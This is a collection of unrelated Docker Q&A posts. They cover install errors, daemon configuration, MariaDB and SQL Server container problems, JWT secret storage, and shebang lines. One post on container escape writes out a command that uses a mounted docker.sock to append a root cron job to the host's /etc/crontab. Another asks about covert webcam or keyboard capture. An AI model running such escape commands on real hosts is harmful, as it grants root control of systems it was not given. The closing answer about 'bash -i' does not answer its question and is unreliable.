Getting error while installing Docker: “docker-ce : Depends: containerd.io (>= 1.2.2-3) but it is not going to be installed”

I am trying to install Docker on Ubuntu 18.04, but the installation fails with the following error:

    The following packages have unmet dependencies:
     docker-ce : Depends: containerd.io (>= 1.2.2-3) but it is not going to be installed
    E: Unable to correct problems, you have held broken packages.
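For reference, a minimal sketch of what I am running (this assumes Docker’s official apt repository has already been added as described in the install docs):

    sudo apt-get update
    sudo apt-get install docker-ce    # this is the step that fails with the error above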

Can an intruder use a Docker Desktop installation to run keyboard or other capture (audio/video, network) on a Windows 10 system?

I’m not looking for a how-to for an exploit.

In a Docker forums post, “lostvicking” seems to be trying to mount their webcam device into a Docker container without success:

Is it possible to forward webcam video to a docker image from Windows 10? I’ve seen the same question asked for Linux and the solution seems to be to use:

    docker run --privileged -v /dev/video0:/dev/video0

Is there a similar trick when I’m running Docker in Windows 10? Presumably there is no equivalent mount point that can be bound?

This made me wonder if Docker Desktop could facilitate installation of keyboard capture, or other capture (audio/video, network), either by an adversarial user with physical access to a shared machine (college computer lab; internet cafe) or an online intruder. Or are Windows USB devices not sharable with Docker containers via Docker Desktop?

Is this possible?

Is there an obvious countermeasure, besides uninstalling Docker Desktop?

Obviously, someone with physical access to a Windows machine can instead install native Windows malware. This question is about whether Docker Desktop adds an additional, less-monitored vector.

systemd ignores docker configuration file at /etc/docker/daemon.json

The Docker service does not apply the configuration in /etc/docker/daemon.json during startup.

    user@host:~$ cat /etc/docker/daemon.json
    {
      "exec-opts": ["native.cgroupdriver=systemd"],
      "log-driver": "json-file",
      "log-opts": {
        "max-size": "100m"
      },
      "storage-driver": "overlay2"
    }

I have to run systemctl daemon-reload and systemctl restart docker after every reboot; only then does the Docker service use the daemon.json file to override the default settings.
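These are the commands in question (run as root or via sudo):

    systemctl daemon-reload
    systemctl restart docker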

Is there a way to make this persistent?

Is storing a JWT secret as a Docker env variable acceptable?

I understand how JWTs work and that with my secret anyone can issue new tokens. I control the server that my node website runs on and am considering different options for hosting the key.

  1. In code – not acceptable, because my code is in a GitHub repo
  2. ENV variable – separate secrets for dev and production without leaking them to GitHub
  3. Store in database – seems like option 2 with more work, since an attacker on the machine can get access to the DB anyway

Option 2 looks like the best method for a simple website (no super-sensitive user info like credit cards or SSNs). Is this a good solution?
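To illustrate option 2, here is a minimal sketch of how the secret could be passed to the container; the variable name JWT_SECRET, the file prod.env, and the image name my-node-site are placeholders, not anything from my actual setup:

    # prod.env is listed in .gitignore and contains a line like:
    #   JWT_SECRET=<long random string>
    docker run -d --env-file ./prod.env my-node-site

The Node code would then read the secret from process.env.JWT_SECRET instead of a hard-coded value.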

MariaDB Docker “Can’t init tc log” on startup when using mounted storage

I am initializing a new MariaDB database. Running Docker with a volume mapped to my home directory allows MariaDB to start up just fine:

    docker run -it --rm --name mymaria \
      -e MYSQL_RANDOM_ROOT_PASSWORD=yes \
      -e MYSQL_PASSWORD=p@$$w0rd \
      -e MYSQL_DATABASE=myapp \
      -e MYSQL_USER=myapp \
      -v /home/myuser/mysql:/var/lib/mysql \
      mariadb:10.2

However, running the mariadb container with a volume via a mounted directory like so:

    docker run -it --rm --name mymaria \
      -e MYSQL_RANDOM_ROOT_PASSWORD=yes \
      -e MYSQL_PASSWORD=p@$$w0rd \
      -e MYSQL_DATABASE=myapp \
      -e MYSQL_USER=myapp \
      -v /mnt/storage/mysql:/var/lib/mysql \
      mariadb:10.2

fails, and docker logs shows the following output:

    Initializing database
    2019-09-23  5:12:13 139724696503616 [ERROR] Can't init tc log
    2019-09-23  5:12:13 139724696503616 [ERROR] Aborting

    Installation of system tables failed!
    ...

Simply removing tc.log as some folks have suggested does not work. Restarting mariadb will rewrite tc.log back into the volume /var/lib/mysql.

Perhaps this is a permissions issue? I feel like I’ve tried every combination of chown on each directory. I do notice that Docker appears to change the mounted directory /mnt/storage/mysql to the following, which I find odd:

    drwxr-xr-x 2 systemd-coredump root 176 Sep 22 23:11 mysql
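For example, one of the ownership combinations I tried (this assumes the official mariadb image runs mysqld as UID/GID 999, which may differ between image versions):

    sudo chown -R 999:999 /mnt/storage/mysql
    sudo chmod -R u+rwX /mnt/storage/mysql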

I encounter this issue only with the 10.2 tag and not with latest. However, the orchestration I’m working from specifies mariadb:10.2.

Executing Docker Commands Without sudo

I found a solution that works perfectly on Ubuntu 18.04. Follow the steps below.

If you are already logged in, run the command below to add your user to the docker group:

Step 1:

    sudo usermod -aG docker $USER

To apply the new group membership, log in again or run the command below:

Step 2:

    su - $USER

Confirm the membership (e.g. by running groups); the output should include docker:

    username adm cdrom sudo dip plugdev lpadmin sambashare docker

To check, run any Docker command without sudo, for example:

    docker images

Permissions issue in Docker SQL Server 2017 while restoring certificate

Docker SQL Server 2017 container, @latest tag. Using the master database.

The error I am facing is the following:

[S00019][15208] The certificate, asymmetric key, or private key file is not valid or does not exist; or you do not have permissions for it.

The closest thing I have found to this exact question is this issue on Stack Overflow. However, the answer doesn’t work for me. This question has a similar answer.

I have also tried the instructions here, and here.

So going through the parts of the error:

  1. I have recreated the files twice, so I don’t think it’s the “invalid” part. And it’s obviously not the “does not exist” part (if I put in the wrong password, it tells me it’s the wrong password).
  2. I have backed up and restored the SMK and Master Key without issue, so I don’t think it’s the permissions issue. The files have the exact same permissions.

I can’t get the certificate to restore no matter what I try. I have searched the GitHub issues to no avail so I don’t think it’s a bug. I must be doing something wrong.

Relevant code:

    -- on Prod
    BACKUP CERTIFICATE sqlserver_backup_cert
        TO FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.cer'
        WITH PRIVATE KEY (
            FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.key',
            ENCRYPTION BY PASSWORD = 'foobar'
        )
    GO

    -- on Test
    CREATE CERTIFICATE sqlserver_backup_cert
        FROM FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.crt'
        WITH PRIVATE KEY (
            FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.key',
            DECRYPTION BY PASSWORD = 'foobar'
        )
    GO

It’s noteworthy that /var/opt/mssql/certs is a Docker volume. However, I have also tried creating my own directory inside the container and using docker cp. No change.
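For completeness, a sketch of that docker cp attempt (the container name mssql and the target directory are placeholders for my actual setup):

    # create a separate directory inside the container and copy the files in
    docker exec -u root mssql mkdir -p /var/opt/mssql/certs2
    docker cp sqlserver_backup_cert.crt mssql:/var/opt/mssql/certs2/
    docker cp sqlserver_backup_cert.key mssql:/var/opt/mssql/certs2/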

How to execute a command directly on the host system through docker.sock from a Docker container?

I’ve been studying Docker security and examining ways of escaping from a container to the host.

Suppose the Docker socket is mounted into the container at /var/run/docker.sock, so that the Docker client can send commands to the Docker daemon (dockerd).

To execute commands on the host, I could run another container and mount /etc/ into it read-write to schedule cron jobs (is it possible to mount /etc/ into the current container?), as sketched below.
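A rough sketch of that approach, assuming the docker CLI is available inside the compromised container (the alpine image and the cron payload are placeholders):

    # use the mounted socket to start a new container with the host's /etc mounted
    # read-write, then append an entry that the host's cron daemon will execute
    docker -H unix:///var/run/docker.sock run --rm -v /etc:/host-etc alpine \
      sh -c 'echo "* * * * * root id > /tmp/escape-proof" >> /host-etc/crontab'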

Besides the above, what other methods are there for executing commands on the host through /var/run/docker.sock?

Alternative to Docker that is less restrictive for maintaining package dependencies

I work on robotics with ROS running on Xenial, but this applies to any application running on Ubuntu. With a team of engineers, it’s rather hard to keep everyone’s test station uniform in package versions. A while back, we had a testbed break completely because an update/upgrade changed much of a package’s functionality.

I want to avoid this and have a solution that allows me to duplicate these testbeds with ease.

I realize that Docker is the popular solution for this, but a container is a little too restrictive for my needs. I don’t mind reinstalling drivers and the like, and I’m finding it cumbersome to deal with Docker-specific issues in getting my original testbed running (especially as it requires multiple containers).

Is there a solution available that can achieve my needs without going as far as a container like Docker?

The dumb method would just be to clone my entire testbed… maybe that’s still the best option for me?

#!/bin/bash -i: when to use it in a Dockerfile

I need to understand when I need to use the -i flag.

It’s a convention so the *nix system knows what kind of interpreter to run.

For example, older flavors of AT&T Unix defaulted to sh (the Bourne shell), while older versions of BSD defaulted to csh (the C shell).

Even today (when most systems run bash, the “Bourne Again Shell”), scripts can be written in bash, Python, Perl, Ruby, PHP, etc. For example, you might see #!/bin/perl or #!/bin/perl5.
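As a small illustration of the convention (the script body is arbitrary):

    #!/bin/bash -i
    # the first line tells the kernel which interpreter executes this file;
    # the -i flag asks bash to start as an interactive shell, so startup files
    # such as ~/.bashrc are read before the commands below run
    echo "running under an interactive bash"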